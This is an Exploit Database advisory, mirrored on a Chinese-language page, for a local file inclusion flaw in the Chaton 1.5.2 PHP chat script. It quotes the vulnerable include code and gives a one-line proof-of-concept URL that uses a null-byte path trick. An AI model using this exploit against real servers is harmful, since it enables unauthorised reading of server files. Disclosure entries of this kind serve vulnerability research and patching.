Chaton 1.5.2 – Local File Inclusion

Exploit Database
92 阅读

作者： cr4wl3r

日期： 2010-03-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11657/

[+] Chaton <= 1.5.2 Local File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: Donwload: http://easy-script.com/scripts-dl/chaton-1.5.2.zip
[+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friend

[+] Code:

if (file_exists( "lang/$chat_lang/deplacer.php")) {
include( "lang/$chat_lang/deplacer.php");
}

if ($chat_salon != $newsalon) {
if ($chat_hide == false) {
// Salle publique = Recupere le vrai nom
$nomsalle = NomSalonPublic( $newsalon);
if ($nomsalle == '') {
// Salon priv�
$salon_prive = true;
$nomsalle = $newsalon;
} else {
$salon_prive = false;
}

[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00]

last Exploits
Chaton 1.5.2 – Local File Inclusion的更多信息

Joomla! Component iNetLanka Multiple Map 1.0 – Local File Inclusion：
Joomla! Component Smart Shoutbox 3.0.0 – SQL Injection：
Webmobo WB News System – Blind SQL Injection：
DmxReady Bilboard 1.2 – SQL Injection：
WordPress Theme Trending 0.1 – ‘cpage’ Cross-Site Scripting：
Forma LMS 2.3 – ‘First & Last Name’ Stored Cross-Site Scripting：
WordPress Plugin Download Manager Free 2.7.94 & Pro 4 – (Authenticated) Persistent Cross-Site Scripting：
vPhoto-Album 4.2 iOS – Local File Inclusion：